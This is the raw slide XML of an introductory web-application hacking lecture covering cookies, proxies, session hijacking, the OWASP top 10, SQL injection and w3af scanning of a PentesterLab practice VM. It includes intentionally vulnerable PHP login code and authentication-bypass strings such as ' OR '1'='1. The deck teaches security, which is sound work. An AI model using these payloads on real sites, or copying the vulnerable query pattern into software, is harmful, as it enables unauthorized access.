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6D3EC5A-4E26-4E45-AA8A-EEF2597E44F7}">
  <a:tblStyle styleName="Table_0" styleId="{E6D3EC5A-4E26-4E45-AA8A-EEF2597E44F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75BB7E15-31E7-4080-A25C-3AFF7D07E15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A7989DB9-B474-450D-B605-22F0AB1791C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0" name="Shape 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3" name="Shape 5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3" name="Shape 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1" name="Shape 6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3" name="Shape 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3" name="Shape 6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9" name="Shape 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5" name="Shape 6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1" name="Shape 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1" name="Shape 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7" name="Shape 6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3" name="Shape 6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8" name="Shape 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5" name="Shape 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5" name="Shape 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7" name="Shape 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3" name="Shape 7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https://www.pentesterlab.com/from_sqli_to_shell.html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esources.infosecinstitute.com/w3af-tutorial/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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SQL_Injection_Prevention_Cheat_Sheet" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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s2.php.net/pdo.prepared-statements" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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ntestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3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l.dropbox.com/u/14820738/SQLi.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://intellavis.com/blog/?p=498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="https://www.pentesterlab.com/from_sqli_to_shell.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId6"/><Relationship Target="https://www.owasp.org/index.php/Main_Page" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5"/><Relationship Target="http://sqlninja.sourceforge.net/sqlninja-howto.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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rdyQoUNeXSg&amp;feature=relmfu" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3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/>
              <a:t>Web Application Hacking/Security 101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Spring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Cookies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Most common place to have session identifier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Server sends a response with "Set-Cookie" header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Variable=value pair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followed by other common attributes usually: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Domain,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Path,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Expires,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Short-term  or   Long-term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Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828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only send over encrypted channel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400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828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prevents script code from accessing cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828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i.e. Javascript accesses cookies via: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document.cookie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Cookies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Can be stored on hard drive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location differs per browser &amp; OS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during actual communication, are stored in browser's memory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and only Short-term cookies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Proxy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 is stateless, so usually no timeout concerns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us to set up proxy to intercept and tamper with HTTP requests / responses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Proxy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33150" x="675850"/>
            <a:ext cy="1701800" cx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y="3568150" x="3588025"/>
            <a:ext cy="964199" cx="1948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Proxy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127.0.0.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3568150" x="6559825"/>
            <a:ext cy="964199" cx="1948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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="110" name="Shape 110"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="108" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3896049" x="1878624"/>
            <a:ext cy="154200" cx="170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1" name="Shape 111"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="4422925" x="2335574"/>
            <a:ext cy="9899" cx="126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2" name="Shape 112"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="108" idx="3"/>
            <a:endCxn id="109" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4050249" x="5536224"/>
            <a:ext cy="0" cx="102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y="4452725" x="5536174"/>
            <a:ext cy="0" cx="101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y="4999375" x="914400"/>
            <a:ext cy="5268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4618375" x="3597975"/>
            <a:ext cy="526800" cx="1888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Intercept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(pause and play capability)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proxy demo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HTTPS misuse / Session Hijacking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Very common for websites to have just https on the logon page, and then drop https down to http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33150" x="675850"/>
            <a:ext cy="1701800" cx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y="3568150" x="6559825"/>
            <a:ext cy="964199" cx="1948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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="130" name="Shape 130"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="131" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3896050" x="1878625"/>
            <a:ext cy="154200" cx="170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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="4422925" x="2335574"/>
            <a:ext cy="9899" cx="126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3" name="Shape 133"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="131" idx="3"/>
            <a:endCxn id="129" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4050249" x="5536225"/>
            <a:ext cy="0" cx="102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y="4452725" x="5536174"/>
            <a:ext cy="0" cx="101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y="4999375" x="914400"/>
            <a:ext cy="5268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Tester</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671850" x="3635400"/>
            <a:ext cy="2428271" cx="2081375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WIFI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09550" x="2352250"/>
            <a:ext cy="1701800" cx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y="6142375" x="3886200"/>
            <a:ext cy="5268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3330125" x="1907725"/>
            <a:ext cy="471899" cx="165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on https page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4578950" x="5508600"/>
            <a:ext cy="957299" cx="194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authenticates, sends reply + cookie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 flipH="1">
            <a:off y="4606749" x="2183425"/>
            <a:ext cy="51300" cx="149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y="4717700" x="2067454"/>
            <a:ext cy="333000" cx="195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browses site on http</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Shape 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3385645" x="3510525"/>
            <a:ext cy="2844504" cx="2442095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Attacker can sniff cookie, hijack session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Strict Transport Security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header to force HTTPS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33150" x="675850"/>
            <a:ext cy="1701800" cx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y="3568150" x="6559825"/>
            <a:ext cy="964199" cx="1948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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="152" name="Shape 152"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="153" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3896050" x="1878625"/>
            <a:ext cy="154200" cx="170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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="4422925" x="2335574"/>
            <a:ext cy="9899" cx="126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5" name="Shape 155"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="153" idx="3"/>
            <a:endCxn id="151" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4050249" x="5536225"/>
            <a:ext cy="0" cx="102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y="4452725" x="5536174"/>
            <a:ext cy="0" cx="101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y="4999375" x="914400"/>
            <a:ext cy="5268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Tester</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Shape 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671850" x="3635400"/>
            <a:ext cy="2428271" cx="2081375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WIFI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09550" x="2352250"/>
            <a:ext cy="1701800" cx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y="6142375" x="3886200"/>
            <a:ext cy="5268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Attacker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4989075" x="4967450"/>
            <a:ext cy="790799" cx="323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</a:rPr>
              <a:t>with HTTPS always on, attacker must break SSL to pull off attack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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1809571">
            <a:off y="1063480" x="3190467"/>
            <a:ext cy="5506253" cx="6052961"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F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toy architecture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69" name="Shape 169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1" name="Shape 171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5" name="Shape 175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6" name="Shape 176"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="172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y="1520675" x="3498575"/>
            <a:ext cy="53175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y="5198175" x="377675"/>
            <a:ext cy="1411200" cx="265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Clientside, the following things can run:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Javascript, actionscript, vbscript, html5, etc...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y="4893375" x="5330675"/>
            <a:ext cy="1411200" cx="265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Way more going on serverside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Security Basics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sites are not secure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Attackers can find ways to access confidential data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Attackers can use vulnerable websites to attack other users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 wasn't designed to be secure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Was built for static, read-only pages to be shared between researchers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intrinsic security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sessions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dynamic page support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the modern stuff today was basically bolted on later....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Application Security Basics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wasn't intended to support Ecommerce,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online banking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taxes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insurance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medical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Become familiar with web application architecture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Become familiar with common web vulnerabilities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203" name="Shape 203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04" name="Shape 204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05" name="Shape 205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206" name="Shape 206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07" name="Shape 207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08" name="Shape 208"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="207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>
            <a:stCxn id="207" idx="3"/>
            <a:endCxn id="203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1" name="Shape 211"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="206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3" name="Shape 213"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="207" idx="2"/>
            <a:endCxn id="204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220" name="Shape 220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21" name="Shape 221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22" name="Shape 222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23" name="Shape 223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224" name="Shape 224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25" name="Shape 225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26" name="Shape 226"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="225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7" name="Shape 227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8" name="Shape 228"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="225" idx="3"/>
            <a:endCxn id="220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29" name="Shape 229"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="224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0" name="Shape 230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1" name="Shape 231"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="225" idx="2"/>
            <a:endCxn id="222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32" name="Shape 232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233" name="Shape 233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234" name="Shape 234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235" name="Shape 235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236" name="Shape 236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237" name="Shape 237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238" name="Shape 238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239" name="Shape 239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240" name="Shape 240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241" name="Shape 241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248" name="Shape 248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49" name="Shape 249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50" name="Shape 250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51" name="Shape 251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252" name="Shape 252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53" name="Shape 253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54" name="Shape 254"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="253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5" name="Shape 255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6" name="Shape 256"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="253" idx="3"/>
            <a:endCxn id="248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57" name="Shape 257"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="252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59" name="Shape 259"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="253" idx="2"/>
            <a:endCxn id="250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60" name="Shape 260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261" name="Shape 261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262" name="Shape 262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263" name="Shape 263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264" name="Shape 264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265" name="Shape 265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266" name="Shape 266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267" name="Shape 267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269" name="Shape 269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270" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="5648201"/>
            <a:ext cy="777000" cx="78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271" name="Shape 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="4581182"/>
            <a:ext cy="777000" cx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272" name="Shape 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4752166" x="39435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(Java)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5590366" x="41721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274" name="Shape 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5666566" x="53913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275" name="Shape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4546880" x="4111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76" name="Shape 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5156480" x="47208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77" name="Shape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1270279" x="4416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78" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1879880" x="5559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285" name="Shape 285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86" name="Shape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3358538" x="2870089"/>
            <a:ext cy="915299" cx="21389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87" name="Shape 287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88" name="Shape 288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289" name="Shape 289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90" name="Shape 290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91" name="Shape 291"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="290" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3014544" x="904349"/>
            <a:ext cy="276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2" name="Shape 292"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3506875" x="874349"/>
            <a:ext cy="1506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3" name="Shape 293"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="290" idx="3"/>
            <a:endCxn id="285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4" name="Shape 294"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="289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96" name="Shape 296"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="290" idx="2"/>
            <a:endCxn id="287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97" name="Shape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1557500" x="513285"/>
            <a:ext cy="1205820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298" name="Shape 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3691100" x="2084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299" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4072100" x="1122886"/>
            <a:ext cy="1205820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300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1883844" x="2613400"/>
            <a:ext cy="10958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301" name="Shape 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3251480" x="220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302" name="Shape 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3784880" x="47970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303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3708680" x="57114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304" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2946680" x="57876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305" name="Shape 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2260880" x="4492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306" name="Shape 306"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1422679" x="6016200"/>
            <a:ext cy="1068390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307" name="Shape 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="5648201"/>
            <a:ext cy="777000" cx="78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308" name="Shape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="4581182"/>
            <a:ext cy="777000" cx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309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4752166" x="39435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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5590366" x="41721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311" name="Shape 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5666566" x="5391388"/>
            <a:ext cy="777000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312" name="Shape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1734450" x="1290425"/>
            <a:ext cy="4925825" cx="7576092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Huge attack surface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Obligatory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Comic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834" x="3778958"/>
            <a:ext cy="6401240" cx="490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Formal Approach to Vulnerability Assessment (OWASP top 10)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4809" x="0"/>
            <a:ext cy="5138481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337" x="293304"/>
            <a:ext cy="4877792" cx="855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is the #1 application security risk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57200"/>
            <a:ext cy="6907299" cx="817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Injection Flaws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Mixing code and input in same context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Hostile input parsed by interpreter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nothing new for us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Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(SQLi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Formal Assessment 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1365" x="0"/>
            <a:ext cy="465658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 proxies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Basics of web architecture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OWASP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common vulnerabilities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SQLi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XSS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CSRF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SSL &amp; SSL strip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Here's the basic layout...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But tech kitty stoel my megahurtz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Now I need moar processors...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Shape 358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9" name="Shape 359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60" name="Shape 360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3" name="Shape 363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4" name="Shape 364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5" name="Shape 365"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="361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66" name="Shape 366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8075" x="6040763"/>
            <a:ext cy="2391781" cx="310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77" name="Shape 377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8" name="Shape 378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9" name="Shape 379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3" name="Shape 383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4" name="Shape 384"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="380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1657450" x="1291900"/>
            <a:ext cy="334200" cx="67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GET http://www.OnlineStore.com/browse.php?category=processors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96" name="Shape 396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7" name="Shape 397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8" name="Shape 398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1" name="Shape 401"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2637125" x="5694075"/>
            <a:ext cy="0" cx="127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2" name="Shape 402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3" name="Shape 403"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="399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1542150" x="5763250"/>
            <a:ext cy="518700" cx="327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SELECT * FROM products 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WHERE category='processors'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4319925" x="3792275"/>
            <a:ext cy="1002599" cx="178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16" name="Shape 416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8" name="Shape 418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1" name="Shape 421"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2740850" x="5682550"/>
            <a:ext cy="195900" cx="128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2" name="Shape 422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3" name="Shape 423"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="419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24" name="Shape 424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4515875" x="3965175"/>
            <a:ext cy="1325399" cx="185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i7, i5, i4, amd, ARM etc....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5" name="Shape 435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1991650" x="311400"/>
            <a:ext cy="2164555" cx="201725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6" name="Shape 436"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2683225" x="2351525"/>
            <a:ext cy="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>
            <a:off y="1980125" x="3769225"/>
            <a:ext cy="2374499" cx="1913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y="2083875" x="6985000"/>
            <a:ext cy="2374200" cx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y="2452700" x="7146375"/>
            <a:ext cy="484099" cx="703074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0" name="Shape 440"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2740850" x="5682550"/>
            <a:ext cy="195900" cx="128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1" name="Shape 441"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3651400" x="2351600"/>
            <a:ext cy="57600" cx="14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2" name="Shape 442"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="438" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3270975" x="5751700"/>
            <a:ext cy="195899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y="2395075" x="2455250"/>
            <a:ext cy="218999" cx="114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2337450" x="5809350"/>
            <a:ext cy="230400" cx="103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y="3363250" x="2547475"/>
            <a:ext cy="334200" cx="94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y="3017475" x="5901550"/>
            <a:ext cy="380400" cx="7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90518" x="32087"/>
            <a:ext cy="2652731" cx="419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SQL Basics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retrieve information using the SELECT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update information using the UPDATE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add new information using the INSERT statement;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delete information using the DELETE statement.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b="1" lang="en"/>
              <a:t>The characters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> -- </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" lang="en"/>
              <a:t>comment out anything that follows them in a SQL statement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types of SQLi	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Inband (AKA "Error-based")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Out-of-band (AKA "Union-Based")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4800" lang="en"/>
              <a:t>and Inferential (AKA "Blind")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Attack Methodology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Identify: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The injection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the injection type (integer or string)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lang="en"/>
              <a:t>Attack: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Error-based SQLi (Easiest)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Union-based SQLi (Best data extractor)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Blind SQLi (Worst case)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Vulnerability Scanners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Union-based is where the $$$ is at. (Best data extractor)  But most tools don't do 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472" name="Shape 472"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="2220375" x="8718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{E6D3EC5A-4E26-4E45-AA8A-EEF2597E44F7}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mieliekoek.pl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wpoison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sqlmap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(blind by default, and union if specified)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wapiti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w3af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sqid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get on with it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  <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>//connect to db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$conn = mysql_connect("localhost","username","password");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//build SQL statement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$query = "SELECT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 '$_POST["username"]' ".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"AND password = '$_POST["password"]' ";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400" lang="en"/>
              <a:t>...............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//run query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$result = mysql_query ($query);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//ensure a user was returned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$numrows = mysql_num_rows($result);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if($numrows != 0)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header("Location:admin.php");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} else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die('Invalid username or password.');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}</a:t>
            </a:r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00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y="1599775" x="392100"/>
            <a:ext cy="461099" cx="855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lang="en"/>
              <a:t>The admin login php code ON BAD WEBSITES will usually look like this, in some point of time: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Stateless protocol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plaintext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Based on client </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and server </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>responses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Headers, followed by request or response body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HTTP requests must use specific request </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>method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data passed via variable=value pairs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responses use </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>status code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example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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>'owen'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400"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 password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>kittens'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t> 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25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y="3374775" x="6500900"/>
            <a:ext cy="253499" cx="88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y="3743625" x="6477800"/>
            <a:ext cy="218999" cx="9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kittens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y="4400600" x="714825"/>
            <a:ext cy="1671299" cx="345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correct implementations will use hashed passwords though, and this is handled in the logic layer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manipulation example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/>
            </a:b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SELECT id, name FROM users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 WHERE name ='owen'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 password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anything' OR '1' = '1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>';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4650" x="5179525"/>
            <a:ext cy="2295525" cx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y="3374775" x="6500900"/>
            <a:ext cy="253499" cx="88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3743625" x="6477800"/>
            <a:ext cy="218999" cx="313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lololol' OR '1'='1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y="4400600" x="714825"/>
            <a:ext cy="1671299" cx="552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note the tick (') placement in the attack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 flipH="1">
            <a:off y="4077724" x="3792275"/>
            <a:ext cy="507300" cx="391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y="5345750" x="1118250"/>
            <a:ext cy="680099" cx="638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This is a TOY example, and is unlikely to occur in most sites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ME COOL STUFF!!!!1!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1600200" x="457200"/>
            <a:ext cy="4967700" cx="477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Our hands-on example for today:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr u="sng" sz="2400" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.pentesterlab.com/from_sqli_to_shell.html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Get the .iso and the .pdf if you haven't already.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Boot it up in </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en"/>
              <a:t>VMware Player</a:t>
            </a:r>
            <a:br>
              <a:rPr u="sng" b="1" sz="2400" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>(I've had networking problems with Virtual Box)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9" name="Shape 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69450" x="5226007"/>
            <a:ext cy="5277064" cx="391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boot up the VM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Steps we will take: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Enumeration (Discovery)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Vulnerability Analysis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Vulnerability Exploitation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???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Profit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the IP of the VM you just booted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57200"/>
            <a:ext cy="5235663" cx="822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w3af comes with backtrack 5 and is a python program located in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>/pentest/web/w3af/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run via:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>python w3af_console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tutorial available here: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http://resources.infosecinstitute.com/w3af-tutorial/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its great :D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 5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do some discovery with w3af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1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 in the w3af console:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>target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view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>set target &lt;&lt;use the ip of the target vm&gt;&gt;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y="2627525" x="91903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23084" x="457200"/>
            <a:ext cy="2644815" cx="85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2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>'back' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to return to the previous menu, or CTRL-C...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Now we want to select the plugins we want to use, and we want discovery ones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We're going to type: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w3af&gt;&gt; plugins</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" i="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>w3af/plugins&gt;&gt; discovery afd allowedMethods fingerprint_WAF fingerprint_os  ghdb phpEggs phpinfo robotsReader sitemapReader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Enumeration Report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 back, and type "</a:t>
